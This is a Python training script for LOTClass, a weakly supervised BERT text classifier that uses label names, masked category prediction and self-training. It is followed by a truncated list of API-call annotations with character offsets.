from tqdm import tqdm
from LOTClass.bert.model import LOTClassModel
import warnings
warnings.filterwarnings("ignore")
class LOTClassTrainer(object):
def __init__(self, args):
self.args = args
self.verbose = args.verbose
self.max_len = args.max_len
self.dataset_dir = args.dataset_dir
self.dist_port = args.dist_port
self.num_cpus = min(10, cpu_count() - 1) if cpu_count() > 1 else 1
self.world_size = args.gpus
self.train_batch_size = args.train_batch_size
self.eval_batch_size = args.eval_batch_size
self.accum_steps = args.accum_steps
eff_batch_size = self.train_batch_size * self.world_size * self.accum_steps
assert abs(eff_batch_size - 128) < 10, f"Make sure the effective training batch size is around 128, current: {eff_batch_size}"
print(f"Effective training batch size: {eff_batch_size}")
self.pretrained_lm = args.pretrained_lm
self.tokenizer = BertTokenizer.from_pretrained(self.pretrained_lm, do_lower_case=True)
#self.tokenizer = CamembertTokenizer.from_pretrained(self.pretrained_lm, force_download=True)
self.vocab = self.tokenizer.get_vocab()
self.vocab_size = len(self.vocab)
self.mask_id = self.vocab[self.tokenizer.mask_token]
self.inv_vocab = {k:v for v, k in self.vocab.items()}
self.read_label_names(args.dataset_dir, args.label_names_file)
self.num_class = len(self.label_name_dict)
self.model = LOTClassModel.from_pretrained(self.pretrained_lm,
output_attentions=False,
output_hidden_states=False,
num_labels=self.num_class)
self.read_data(args.dataset_dir, args.train_file, args.test_file, args.test_label_file)
self.with_test_label = True if args.test_label_file is not None else False
self.temp_dir = f'tmp_{self.dist_port}'
self.mcp_loss = nn.CrossEntropyLoss()
self.st_loss = nn.KLDivLoss(reduction='batchmean')
self.update_interval = args.update_interval
self.early_stop = args.early_stop
# set up distributed training
def set_up_dist(self, rank):
dist.init_process_group(
backend='nccl',
init_method=f'tcp://localhost:{self.dist_port}',
world_size=self.world_size,
rank=rank
)
# create local model
model = self.model.to(rank)
model = DDP(model, device_ids=[rank], find_unused_parameters=True)
return model
# get document truncation statistics with the defined max length
def corpus_trunc_stats(self, docs):
doc_len = []
for doc in docs:
input_ids = self.tokenizer.encode(doc, add_special_tokens=True)
doc_len.append(len(input_ids))
print(f"Document max length: {np.max(doc_len)}, avg length: {np.mean(doc_len)}, std length: {np.std(doc_len)}")
trunc_frac = np.sum(np.array(doc_len) > self.max_len) / len(doc_len)
print(f"Truncated fraction of all documents: {trunc_frac}")
# convert a list of strings to token ids
def encode(self, docs):
encoded_dict = self.tokenizer.batch_encode_plus(docs, add_special_tokens=True, max_length=self.max_len, padding='max_length',
return_attention_mask=True, truncation=True, return_tensors='pt')
input_ids = encoded_dict['input_ids']
if self.verbose:
print(f"input_ids size (from encode): {input_ids.size()}")
print(f"input_ids (from encode): {input_ids}")
attention_masks = encoded_dict['attention_mask']
return input_ids, attention_masks
# convert list of token ids to list of strings
def decode(self, ids):
strings = self.tokenizer.batch_decode(ids, skip_special_tokens=True, clean_up_tokenization_spaces=False)
return strings
# convert dataset into tensors
def create_dataset(self, dataset_dir, text_file, label_file, loader_name, find_label_name=False, label_name_loader_name=None):
loader_file = os.path.join(dataset_dir, loader_name)
if os.path.exists(loader_file):
print(f"Loading encoded texts from {loader_file}")
data = torch.load(loader_file)
else:
print(f"Reading texts from {os.path.join(dataset_dir, text_file)}")
corpus = open(os.path.join(dataset_dir, text_file), encoding="utf-8")
docs = [doc.strip() for doc in corpus.readlines()]
print(f"Converting texts into tensors.")
chunk_size = ceil(len(docs) / self.num_cpus)
chunks = [docs[x:x+chunk_size] for x in range(0, len(docs), chunk_size)]
results = Parallel(n_jobs=self.num_cpus)(delayed(self.encode)(docs=chunk) for chunk in chunks)
input_ids = torch.cat([result[0] for result in results])
print(f"Concatenated input_ids size: {input_ids.size()}")
attention_masks = torch.cat([result[1] for result in results])
print(f"Saving encoded texts into {loader_file}")
if label_file is not None:
print(f"Reading labels from {os.path.join(dataset_dir, label_file)}")
truth = open(os.path.join(dataset_dir, label_file))
labels = [int(label.strip()) for label in truth.readlines()]
labels = torch.tensor(labels)
data = {"input_ids": input_ids, "attention_masks": attention_masks, "labels": labels}
else:
data = {"input_ids": input_ids, "attention_masks": attention_masks}
torch.save(data, loader_file)
if find_label_name:
loader_file = os.path.join(dataset_dir, label_name_loader_name)
if os.path.exists(loader_file):
print(f"Loading texts with label names from {loader_file}")
label_name_data = torch.load(loader_file)
else:
print(f"Reading texts from {os.path.join(dataset_dir, text_file)}")
corpus = open(os.path.join(dataset_dir, text_file), encoding="utf-8")
docs = [doc.strip() for doc in corpus.readlines()]
print("Locating label names in the corpus.")
chunk_size = ceil(len(docs) / self.num_cpus)
chunks = [docs[x:x+chunk_size] for x in range(0, len(docs), chunk_size)]
results = Parallel(n_jobs=self.num_cpus)(delayed(self.label_name_occurrence)(docs=chunk) for chunk in chunks)
input_ids_with_label_name = torch.cat([result[0] for result in results])
attention_masks_with_label_name = torch.cat([result[1] for result in results])
label_name_idx = torch.cat([result[2] for result in results])
print(f"Concatenated input_ids_with_label_name size: {input_ids_with_label_name.size()}")
assert len(input_ids_with_label_name) > 0, "No label names appear in corpus!"
label_name_data = {"input_ids": input_ids_with_label_name, "attention_masks": attention_masks_with_label_name, "labels": label_name_idx}
loader_file = os.path.join(dataset_dir, label_name_loader_name)
print(f"Saving texts with label names into {loader_file}")
torch.save(label_name_data, loader_file)
return data, label_name_data
else:
return data
# find label name indices and replace out-of-vocab label names with [MASK]
def label_name_in_doc(self, doc):
doc = self.tokenizer.tokenize(doc)
if self.verbose:
print(doc)
label_idx = -1 * torch.ones(self.max_len, dtype=torch.long)
new_doc = []
wordpcs = []
idx = 1 # index starts at 1 due to [CLS] token
for i, wordpc in enumerate(doc):
wordpcs.append(wordpc[2:] if wordpc.startswith("##") else wordpc)
if self.verbose:
print(wordpcs)
if idx >= self.max_len - 1: # last index will be [SEP] token
break
if i == len(doc) - 1 or not doc[i+1].startswith("##"):
word = ''.join(wordpcs)
if word in self.label2class:
label_idx[idx] = self.label2class[word]
# replace label names that are not in tokenizer's vocabulary with the [MASK] token
if word not in self.vocab:
wordpcs = [self.tokenizer.mask_token]
new_word = ''.join(wordpcs)
if new_word != self.tokenizer.unk_token:
idx += len(wordpcs)
new_doc.append(new_word)
wordpcs = []
if (label_idx >= 0).any():
return ' '.join(new_doc), label_idx
else:
return None
# find label name occurrences in the corpus
def label_name_occurrence(self, docs):
text_with_label = []
label_name_idx = []
for doc in docs:
result = self.label_name_in_doc(doc)
if result is not None:
text_with_label.append(result[0])
label_name_idx.append(result[1].unsqueeze(0))
if len(text_with_label) > 0:
encoded_dict = self.tokenizer.batch_encode_plus(text_with_label, add_special_tokens=True, max_length=self.max_len,
padding='max_length', return_attention_mask=True, truncation=True, return_tensors='pt')
input_ids_with_label_name = encoded_dict['input_ids']
attention_masks_with_label_name = encoded_dict['attention_mask']
label_name_idx = torch.cat(label_name_idx, dim=0)
else:
input_ids_with_label_name = torch.ones(0, self.max_len, dtype=torch.long)
attention_masks_with_label_name = torch.ones(0, self.max_len, dtype=torch.long)
label_name_idx = torch.ones(0, self.max_len, dtype=torch.long)
return input_ids_with_label_name, attention_masks_with_label_name, label_name_idx
# read text corpus and labels from files
def read_data(self, dataset_dir, train_file, test_file, test_label_file):
self.train_data, self.label_name_data = self.create_dataset(dataset_dir, train_file, None, "train.pt",
find_label_name=True, label_name_loader_name="label_name_data.pt")
if test_file is not None:
self.test_data = self.create_dataset(dataset_dir, test_file, test_label_file, "test.pt")
# read label names from file
def read_label_names(self, dataset_dir, label_name_file):
label_name_file = open(os.path.join(dataset_dir, label_name_file))
label_names = label_name_file.readlines()
self.label_name_dict = {i: [word.lower() for word in category_words.strip().split()] for i, category_words in enumerate(label_names)}
print(f"Label names used for each class are: {self.label_name_dict}")
self.label2class = {}
self.all_label_name_ids = [self.mask_id]
self.all_label_names = [self.tokenizer.mask_token]
for class_idx in self.label_name_dict:
for word in self.label_name_dict[class_idx]:
assert word not in self.label2class, f"\"{word}\" used as the label name by multiple classes!"
self.label2class[word] = class_idx
if word in self.vocab:
self.all_label_name_ids.append(self.vocab[word])
self.all_label_names.append(word)
# create dataset loader
def make_dataloader(self, rank, data_dict, batch_size):
if self.verbose:
print(f"data_dict['input_ids']: {data_dict['input_ids']}")
if "labels" in data_dict:
dataset = TensorDataset(data_dict["input_ids"], data_dict["attention_masks"], data_dict["labels"])
else:
dataset = TensorDataset(data_dict["input_ids"], data_dict["attention_masks"])
sampler = DistributedSampler(dataset, num_replicas=self.world_size, rank=rank)
dataset_loader = DataLoader(dataset, sampler=sampler, batch_size=batch_size, shuffle=False)
return dataset_loader
# filter out stop words and words in multiple categories
def filter_keywords(self, category_vocab_size=100):
all_words = defaultdict(list)
sorted_dicts = {}
for i, cat_dict in self.category_words_freq.items():
sorted_dict = {k:v for k, v in sorted(cat_dict.items(), key=lambda item: item[1], reverse=True)[:category_vocab_size]}
sorted_dicts[i] = sorted_dict
for word_id in sorted_dict:
all_words[word_id].append(i)
repeat_words = []
for word_id in all_words:
if len(all_words[word_id]) > 1:
repeat_words.append(word_id)
self.category_vocab = {}
for i, sorted_dict in sorted_dicts.items():
self.category_vocab[i] = np.array(list(sorted_dict.keys()))
stopwords_vocab = stopwords.words('english')
for i, word_list in self.category_vocab.items():
delete_idx = []
for j, word_id in enumerate(word_list):
word = self.inv_vocab[word_id]
if word in self.label_name_dict[i]:
continue
if not word.isalpha() or len(word) == 1 or word in stopwords_vocab or word_id in repeat_words:
delete_idx.append(j)
self.category_vocab[i] = np.delete(self.category_vocab[i], delete_idx)
def print_predictions(self, word_list):
if not self.verbose: return
print(40*'=')
print(self.decode(word_list))
print(40*'=')
# construct category vocabulary (distributed function)
def category_vocabulary_dist(self, rank, top_pred_num=50, loader_name="category_vocab.pt"):
if self.world_size > 1:
model = self.set_up_dist(rank)
else:
self.model.to(rank)
model = self.model
model.eval()
label_name_dataset_loader = self.make_dataloader(rank, self.label_name_data, self.eval_batch_size)
category_words_freq = {i: defaultdict(float) for i in range(self.num_class)}
wrap_label_name_dataset_loader = tqdm(label_name_dataset_loader) if rank == 0 else label_name_dataset_loader
try:
for batch in wrap_label_name_dataset_loader:
with torch.no_grad():
input_ids = batch[0].to(rank)
input_mask = batch[1].to(rank)
label_pos = batch[2].to(rank)
match_idx = label_pos >= 0
if self.verbose:
print(match_idx)
for input_id in input_ids:
self.print_predictions(input_id)
for attention_mask in input_mask:
print(attention_mask)
predictions = model(input_ids,
pred_mode="mlm",
token_type_ids=None,
attention_mask=input_mask)
if self.verbose:
print(predictions.size())
_, sorted_res = torch.topk(predictions[match_idx], top_pred_num, dim=-1)
label_idx = label_pos[match_idx]
for i, word_list in enumerate(sorted_res):
self.print_predictions(word_list)
for j, word_id in enumerate(word_list):
category_words_freq[label_idx[i].item()][word_id.item()] += 1
if self.verbose:
print(category_words_freq)
save_file = os.path.join(self.temp_dir, f"{rank}_"+loader_name)
torch.save(category_words_freq, save_file)
except RuntimeError as err:
self.cuda_mem_error(err, "eval", rank)
# construct category vocabulary
def category_vocabulary(self, top_pred_num=50, category_vocab_size=100, loader_name="category_vocab.pt"):
loader_file = os.path.join(self.dataset_dir, loader_name)
if os.path.exists(loader_file):
print(f"Loading category vocabulary from {loader_file}")
self.category_vocab = torch.load(loader_file)
else:
print("Contructing category vocabulary.")
if not os.path.exists(self.temp_dir):
os.makedirs(self.temp_dir)
if self.verbose:
print(f"Args: ({top_pred_num, loader_name}); World size: {self.world_size}")
#mp.spawn(self.category_vocabulary_dist, nprocs=self.world_size, args=(top_pred_num, loader_name))
self.category_vocabulary_dist(0, top_pred_num, loader_name)
gather_res = []
for f in os.listdir(self.temp_dir):
if f[-3:] == '.pt':
gather_res.append(torch.load(os.path.join(self.temp_dir, f)))
assert len(gather_res) == self.world_size, "Number of saved files not equal to number of processes!"
self.category_words_freq = {i: defaultdict(float) for i in range(self.num_class)}
for i in range(self.num_class):
for category_words_freq in gather_res:
for word_id, freq in category_words_freq[i].items():
self.category_words_freq[i][word_id] += freq
self.filter_keywords(category_vocab_size)
torch.save(self.category_vocab, loader_file)
if os.path.exists(self.temp_dir):
shutil.rmtree(self.temp_dir)
for i, category_vocab in self.category_vocab.items():
print(f"Class {i} category vocabulary: {[self.inv_vocab[w] for w in category_vocab]}\n")
# prepare self supervision for masked category prediction (distributed function)
def prepare_mcp_dist(self, rank, top_pred_num=50, match_threshold=20, loader_name="mcp_train.pt"):
if self.world_size > 1:
model = self.set_up_dist(rank)
else:
model = self.model
model.eval()
train_dataset_loader = self.make_dataloader(rank, self.train_data, self.eval_batch_size)
all_input_ids = []
all_mask_label = []
all_input_mask = []
category_doc_num = defaultdict(int)
wrap_train_dataset_loader = tqdm(train_dataset_loader) if rank == 0 else train_dataset_loader
try:
for batch in wrap_train_dataset_loader:
with torch.no_grad():
input_ids = batch[0].to(rank)
input_mask = batch[1].to(rank)
predictions = model(input_ids,
pred_mode="mlm",
token_type_ids=None,
attention_mask=input_mask)
_, sorted_res = torch.topk(predictions, top_pred_num, dim=-1)
for i, category_vocab in self.category_vocab.items():
match_idx = torch.zeros_like(sorted_res).bool()
for word_id in category_vocab:
match_idx = (sorted_res == word_id) | match_idx
match_count = torch.sum(match_idx.int(), dim=-1)
valid_idx = (match_count > match_threshold) & (input_mask > 0)
valid_doc = torch.sum(valid_idx, dim=-1) > 0
if valid_doc.any():
mask_label = -1 * torch.ones_like(input_ids)
mask_label[valid_idx] = i
all_input_ids.append(input_ids[valid_doc].cpu())
all_mask_label.append(mask_label[valid_doc].cpu())
all_input_mask.append(input_mask[valid_doc].cpu())
category_doc_num[i] += valid_doc.int().sum().item()
all_input_ids = torch.cat(all_input_ids, dim=0)
all_mask_label = torch.cat(all_mask_label, dim=0)
all_input_mask = torch.cat(all_input_mask, dim=0)
save_dict = {
"all_input_ids": all_input_ids,
"all_mask_label": all_mask_label,
"all_input_mask": all_input_mask,
"category_doc_num": category_doc_num,
}
save_file = os.path.join(self.temp_dir, f"{rank}_"+loader_name)
torch.save(save_dict, save_file)
except RuntimeError as err:
self.cuda_mem_error(err, "eval", rank)
# prepare self supervision for masked category prediction
def prepare_mcp(self, top_pred_num=50, match_threshold=20, loader_name="mcp_train.pt"):
loader_file = os.path.join(self.dataset_dir, loader_name)
if os.path.exists(loader_file):
print(f"Loading masked category prediction data from {loader_file}")
self.mcp_data = torch.load(loader_file)
else:
loader_file = os.path.join(self.dataset_dir, loader_name)
print("Preparing self supervision for masked category prediction.")
if not os.path.exists(self.temp_dir):
os.makedirs(self.temp_dir)
#mp.spawn(self.prepare_mcp_dist, nprocs=self.world_size, args=(top_pred_num, match_threshold, loader_name))
self.prepare_mcp_dist(0, top_pred_num, match_threshold, loader_name)
gather_res = []
for f in os.listdir(self.temp_dir):
if f[-3:] == '.pt':
gather_res.append(torch.load(os.path.join(self.temp_dir, f)))
assert len(gather_res) == self.world_size, "Number of saved files not equal to number of processes!"
all_input_ids = torch.cat([res["all_input_ids"] for res in gather_res], dim=0)
all_mask_label = torch.cat([res["all_mask_label"] for res in gather_res], dim=0)
all_input_mask = torch.cat([res["all_input_mask"] for res in gather_res], dim=0)
category_doc_num = {i: 0 for i in range(self.num_class)}
for i in category_doc_num:
for res in gather_res:
if i in res["category_doc_num"]:
category_doc_num[i] += res["category_doc_num"][i]
print(f"Number of documents with category indicative terms found for each category is: {category_doc_num}")
self.mcp_data = {"input_ids": all_input_ids, "attention_masks": all_input_mask, "labels": all_mask_label}
torch.save(self.mcp_data, loader_file)
if os.path.exists(self.temp_dir):
shutil.rmtree(self.temp_dir)
for i in category_doc_num:
assert category_doc_num[i] > 10, f"Too few ({category_doc_num[i]}) documents with category indicative terms found for category {i}; " \
"try to add more unlabeled documents to the training corpus (recommend) or reduce `--match_threshold` (not recommend)"
print(f"There are totally {len(self.mcp_data['input_ids'])} documents with category indicative terms.")
# masked category prediction (distributed function)
def mcp_dist(self, rank, epochs=5, loader_name="mcp_model.pt"):
if self.world_size > 1:
model = self.set_up_dist(rank)
else:
model = self.model
mcp_dataset_loader = self.make_dataloader(rank, self.mcp_data, self.train_batch_size)
total_steps = len(mcp_dataset_loader) * epochs / self.accum_steps
optimizer = AdamW(filter(lambda p: p.requires_grad, model.parameters()), lr=2e-5, eps=1e-8)
scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=0.1*total_steps, num_training_steps=total_steps)
try:
for i in range(epochs):
model.train()
total_train_loss = 0
if rank == 0:
print(f"Epoch {i+1}:")
wrap_mcp_dataset_loader = tqdm(mcp_dataset_loader) if rank == 0 else mcp_dataset_loader
model.zero_grad()
for j, batch in enumerate(wrap_mcp_dataset_loader):
input_ids = batch[0].to(rank)
input_mask = batch[1].to(rank)
labels = batch[2].to(rank)
mask_pos = labels >= 0
labels = labels[mask_pos]
# mask out category indicative words
input_ids[mask_pos] = self.mask_id
logits = model(input_ids,
pred_mode="classification",
token_type_ids=None,
attention_mask=input_mask)
logits = logits[mask_pos]
loss = self.mcp_loss(logits.view(-1, self.num_class), labels.view(-1)) / self.accum_steps
total_train_loss += loss.item()
loss.backward()
if (j+1) % self.accum_steps == 0:
# Clip the norm of the gradients to 1.0.
nn.utils.clip_grad_norm_(model.parameters(), 1.0)
optimizer.step()
scheduler.step()
model.zero_grad()
avg_train_loss = torch.tensor([total_train_loss / len(mcp_dataset_loader) * self.accum_steps]).to(rank)
gather_list = [torch.ones_like(avg_train_loss) for _ in range(self.world_size)]
if self.world_size > 1:
dist.all_gather(gather_list, avg_train_loss)
avg_train_loss = torch.tensor(gather_list)
if rank == 0:
print(f"Average training loss: {avg_train_loss.mean().item()}")
if rank == 0:
loader_file = os.path.join(self.dataset_dir, loader_name)
torch.save(self.model.state_dict(), loader_file)
except RuntimeError as err:
self.cuda_mem_error(err, "train", rank)
# masked category prediction
def mcp(self, top_pred_num=50, match_threshold=20, epochs=5, loader_name="mcp_model.pt"):
loader_file = os.path.join(self.dataset_dir, loader_name)
if os.path.exists(loader_file):
print(f"\nLoading model trained via masked category prediction from {loader_file}")
else:
self.prepare_mcp(top_pred_num, match_threshold)
print(f"\nTraining model via masked category prediction.")
#mp.spawn(self.mcp_dist, nprocs=self.world_size, args=(epochs, loader_name))
self.mcp_dist(0, epochs, loader_name)
self.model.load_state_dict(torch.load(loader_file))
# prepare self training data and target distribution
def prepare_self_train_data(self, rank, model, idx):
target_num = min(self.world_size * self.train_batch_size * self.update_interval * self.accum_steps, len(self.train_data["input_ids"]))
if idx + target_num >= len(self.train_data["input_ids"]):
select_idx = torch.cat((torch.arange(idx, len(self.train_data["input_ids"])),
torch.arange(idx + target_num - len(self.train_data["input_ids"]))))
else:
select_idx = torch.arange(idx, idx + target_num)
assert len(select_idx) == target_num
idx = (idx + len(select_idx)) % len(self.train_data["input_ids"])
select_dataset = {"input_ids": self.train_data["input_ids"][select_idx],
"attention_masks": self.train_data["attention_masks"][select_idx]}
dataset_loader = self.make_dataloader(rank, select_dataset, self.eval_batch_size)
input_ids, input_mask, preds = self.inference(model, dataset_loader, rank, return_type="data")
gather_input_ids = [torch.ones_like(input_ids) for _ in range(self.world_size)]
gather_input_mask = [torch.ones_like(input_mask) for _ in range(self.world_size)]
gather_preds = [torch.ones_like(preds) for _ in range(self.world_size)]
dist.all_gather(gather_input_ids, input_ids)
dist.all_gather(gather_input_mask, input_mask)
dist.all_gather(gather_preds, preds)
input_ids = torch.cat(gather_input_ids, dim=0).cpu()
input_mask = torch.cat(gather_input_mask, dim=0).cpu()
all_preds = torch.cat(gather_preds, dim=0).cpu()
weight = all_preds**2 / torch.sum(all_preds, dim=0)
target_dist = (weight.t() / torch.sum(weight, dim=1)).t()
all_target_pred = target_dist.argmax(dim=-1)
agree = (all_preds.argmax(dim=-1) == all_target_pred).int().sum().item() / len(all_target_pred)
self_train_dict = {"input_ids": input_ids, "attention_masks": input_mask, "labels": target_dist}
return self_train_dict, idx, agree
# train a model on batches of data with target labels
def self_train_batches(self, rank, model, self_train_loader, optimizer, scheduler, test_dataset_loader):
model.train()
total_train_loss = 0
wrap_train_dataset_loader = tqdm(self_train_loader) if rank == 0 else self_train_loader
model.zero_grad()
try:
for j, batch in enumerate(wrap_train_dataset_loader):
input_ids = batch[0].to(rank)
input_mask = batch[1].to(rank)
target_dist = batch[2].to(rank)
logits = model(input_ids,
pred_mode="classification",
token_type_ids=None,
attention_mask=input_mask)
logits = logits[:, 0, :]
preds = nn.LogSoftmax(dim=-1)(logits)
loss = self.st_loss(preds.view(-1, self.num_class), target_dist.view(-1, self.num_class)) / self.accum_steps
total_train_loss += loss.item()
loss.backward()
if (j+1) % self.accum_steps == 0:
# Clip the norm of the gradients to 1.0.
nn.utils.clip_grad_norm_(model.parameters(), 1.0)
optimizer.step()
scheduler.step()
model.zero_grad()
if self.with_test_label:
acc = self.inference(model, test_dataset_loader, rank, return_type="acc")
gather_acc = [torch.ones_like(acc) for _ in range(self.world_size)]
dist.all_gather(gather_acc, acc)
acc = torch.tensor(gather_acc).mean().item()
avg_train_loss = torch.tensor([total_train_loss / len(wrap_train_dataset_loader) * self.accum_steps]).to(rank)
gather_list = [torch.ones_like(avg_train_loss) for _ in range(self.world_size)]
dist.all_gather(gather_list, avg_train_loss)
avg_train_loss = torch.tensor(gather_list)
if rank == 0:
print(f"lr: {optimizer.param_groups[0]['lr']:.4g}")
print(f"Average training loss: {avg_train_loss.mean().item()}")
if self.with_test_label:
print(f"Test acc: {acc}")
except RuntimeError as err:
self.cuda_mem_error(err, "train", rank)
# self training (distributed function)
def self_train_dist(self, rank, epochs, loader_name="final_model.pt"):
model = self.set_up_dist(rank)
test_dataset_loader = self.make_dataloader(rank, self.test_data, self.eval_batch_size) if self.with_test_label else None
total_steps = int(len(self.train_data["input_ids"]) * epochs / (self.world_size * self.train_batch_size * self.accum_steps))
optimizer = AdamW(filter(lambda p: p.requires_grad, model.parameters()), lr=1e-6, eps=1e-8)
scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=0.1*total_steps, num_training_steps=total_steps)
idx = 0
if self.early_stop:
agree_count = 0
for i in tqdm(range(int(total_steps / self.update_interval))):
self_train_dict, idx, agree = self.prepare_self_train_data(rank, model, idx)
# early stop if current prediction agrees with target distribution for 3 consecutive updates
if self.early_stop:
if 1 - agree < 1e-3:
agree_count += 1
else:
agree_count = 0
if agree_count >= 3:
break
self_train_dataset_loader = self.make_dataloader(rank, self_train_dict, self.train_batch_size)
self.self_train_batches(rank, model, self_train_dataset_loader, optimizer, scheduler, test_dataset_loader)
if rank == 0:
loader_file = os.path.join(self.dataset_dir, loader_name)
print(f"Saving final model to {loader_file}")
torch.save(model.module.state_dict(), loader_file)
# self training
def self_train(self, epochs, loader_name="final_model.pt"):
loader_file = os.path.join(self.dataset_dir, loader_name)
if os.path.exists(loader_file):
print(f"\nFinal model {loader_file} found, skip self-training")
else:
rand_idx = torch.randperm(len(self.train_data["input_ids"]))
self.train_data = {"input_ids": self.train_data["input_ids"][rand_idx],
"attention_masks": self.train_data["attention_masks"][rand_idx]}
print(f"\nStart self-training.")
if self.world_size > 1:
mp.spawn(self.self_train_dist, nprocs=self.world_size, args=(epochs, loader_name))
else:
self.self_train_dist(0, epochs, loader_name)
# use a model to do inference on a dataloader
def inference(self, model, dataset_loader, rank, return_type):
if return_type == "data":
all_input_ids = []
all_input_mask = []
all_preds = []
elif return_type == "acc":
pred_labels = []
truth_labels = []
elif return_type == "pred":
pred_labels = []
model.eval()
try:
for batch in dataset_loader:
with torch.no_grad():
input_ids = batch[0].to(rank)
input_mask = batch[1].to(rank)
logits = model(input_ids,
pred_mode="classification",
token_type_ids=None,
attention_mask=input_mask)
logits = logits[:, 0, :]
if return_type == "data":
all_input_ids.append(input_ids)
all_input_mask.append(input_mask)
all_preds.append(nn.Softmax(dim=-1)(logits))
elif return_type == "acc":
labels = batch[2]
pred_labels.append(torch.argmax(logits, dim=-1).cpu())
truth_labels.append(labels)
elif return_type == "pred":
pred_labels.append(torch.argmax(logits, dim=-1).cpu())
if return_type == "data":
all_input_ids = torch.cat(all_input_ids, dim=0)
all_input_mask = torch.cat(all_input_mask, dim=0)
all_preds = torch.cat(all_preds, dim=0)
return all_input_ids, all_input_mask, all_preds
elif return_type == "acc":
pred_labels = torch.cat(pred_labels, dim=0)
truth_labels = torch.cat(truth_labels, dim=0)
samples = len(truth_labels)
acc = (pred_labels == truth_labels).float().sum() / samples
return acc.to(rank)
elif return_type == "pred":
pred_labels = torch.cat(pred_labels, dim=0)
return pred_labels
except RuntimeError as err:
self.cuda_mem_error(err, "eval", rank)
# use trained model to make predictions on the test set
def write_results(self, loader_name="final_model.pt", out_file="out.txt"):
loader_file = os.path.join(self.dataset_dir, loader_name)
assert os.path.exists(loader_file)
print(f"\nLoading final model from {loader_file}")
self.model.load_state_dict(torch.load(loader_file))
self.model.to(0)
test_set = TensorDataset(self.test_data["input_ids"], self.test_data["attention_masks"])
test_dataset_loader = DataLoader(test_set, sampler=SequentialSampler(test_set), batch_size=self.eval_batch_size)
pred_labels = self.inference(self.model, test_dataset_loader, 0, return_type="pred")
out_file = os.path.join(self.dataset_dir, out_file)
print(f"Writing prediction results to {out_file}")
f_out = open(out_file, 'w')
for label in pred_labels:
f_out.write(str(label.item()) + '\n')
# print error message based on CUDA memory error
def cuda_mem_error(self, err, mode, rank):
if rank == 0:
print(err)
if "CUDA out of memory" in str(err):
if mode == "eval":
print(f"Your GPUs can't hold the current batch size for evaluation, try to reduce `--eval_batch_size`, current: {self.eval_batch_size}")
else:
print(f"Your GPUs can't hold the current batch size for training, try to reduce `--train_batch_size`, current: {self.train_batch_size}")
sys.exit(1)
| [
"torch.nn.CrossEntropyLoss",
"multiprocessing.cpu_count",
"numpy.array",
"torch.utils.data.distributed.DistributedSampler",
"torch.sum",
"sys.exit",
"joblib.delayed",
"torch.arange",
"os.path.exists",
"numpy.mean",
"os.listdir",
"nltk.corpus.stopwords.words",
"numpy.delete",
"numpy.max",
... | [((970, 1003), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""'], {}), "('ignore')\n", (993, 1003), False, 'import warnings\n'), ((1868, 1937), 'transformers.BertTokenizer.from_pretrained', 'BertTokenizer.from_pretrained', (['self.pretrained_lm'], {'do_lower_case': '(True)'}), '(self.pretrained_lm, do_lower_case=True)\n', (1897, 1937), False, 'from transformers import BertTokenizer\n'), ((2396, 2529), 'LOTClass.bert.model.LOTClassModel.from_pretrained', 'LOTClassModel.from_pretrained', (['self.pretrained_lm'], {'output_attentions': '(False)', 'output_hidden_states': '(False)', 'num_labels': 'self.num_class'}), '(self.pretrained_lm, output_attentions=False,\n output_hidden_states=False, num_labels=self.num_class)\n', (2425, 2529), False, 'from LOTClass.bert.model import LOTClassModel\n'), ((2930, 2951), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {}), '()\n', (2949, 2951), False, 'from torch import nn\n'), ((2975, 3010), 'torch.nn.KLDivLoss', 'nn.KLDivLoss', ([], {'reduction': '"""batchmean"""'}), "(reduction='batchmean')\n", (2987, 3010), False, 'from torch import nn\n'), ((3181, 3313), 'torch.distributed.init_process_group', 'dist.init_process_group', ([], {'backend': '"""nccl"""', 'init_method': 'f"""tcp://localhost:{self.dist_port}"""', 'world_size': 'self.world_size', 'rank': 'rank'}), "(backend='nccl', init_method=\n f'tcp://localhost:{self.dist_port}', world_size=self.world_size, rank=rank)\n", (3204, 3313), True, 'import torch.distributed as dist\n'), ((3448, 3506), 'torch.nn.parallel.DistributedDataParallel', 'DDP', (['model'], {'device_ids': '[rank]', 'find_unused_parameters': '(True)'}), '(model, device_ids=[rank], find_unused_parameters=True)\n', (3451, 3506), True, 'from torch.nn.parallel import DistributedDataParallel as DDP\n'), ((5102, 5140), 'os.path.join', 'os.path.join', (['dataset_dir', 'loader_name'], {}), '(dataset_dir, loader_name)\n', (5114, 5140), False, 'import os\n'), ((5152, 5179), 'os.path.exists', 'os.path.exists', (['loader_file'], {}), '(loader_file)\n', (5166, 5179), False, 'import os\n'), ((13068, 13136), 'torch.utils.data.distributed.DistributedSampler', 'DistributedSampler', (['dataset'], {'num_replicas': 'self.world_size', 'rank': 'rank'}), '(dataset, num_replicas=self.world_size, rank=rank)\n', (13086, 13136), False, 'from torch.utils.data.distributed import DistributedSampler\n'), ((13162, 13236), 'torch.utils.data.DataLoader', 'DataLoader', (['dataset'], {'sampler': 'sampler', 'batch_size': 'batch_size', 'shuffle': '(False)'}), '(dataset, sampler=sampler, batch_size=batch_size, shuffle=False)\n', (13172, 13236), False, 'from torch.utils.data import TensorDataset, DataLoader, SequentialSampler\n'), ((13405, 13422), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (13416, 13422), False, 'from collections import defaultdict\n'), ((14100, 14126), 'nltk.corpus.stopwords.words', 'stopwords.words', (['"""english"""'], {}), "('english')\n", (14115, 14126), False, 'from nltk.corpus import stopwords\n'), ((17233, 17276), 'os.path.join', 'os.path.join', (['self.dataset_dir', 'loader_name'], {}), '(self.dataset_dir, loader_name)\n', (17245, 17276), False, 'import os\n'), ((17288, 17315), 'os.path.exists', 'os.path.exists', (['loader_file'], {}), '(loader_file)\n', (17302, 17315), False, 'import os\n'), ((19454, 19470), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (19465, 19470), False, 'from collections import defaultdict\n'), ((21898, 21941), 'os.path.join', 'os.path.join', (['self.dataset_dir', 'loader_name'], {}), '(self.dataset_dir, loader_name)\n', (21910, 21941), False, 'import os\n'), ((21953, 21980), 'os.path.exists', 'os.path.exists', (['loader_file'], {}), '(loader_file)\n', (21967, 21980), False, 'import os\n'), ((24789, 24903), 'transformers.get_linear_schedule_with_warmup', 'get_linear_schedule_with_warmup', (['optimizer'], {'num_warmup_steps': '(0.1 * total_steps)', 'num_training_steps': 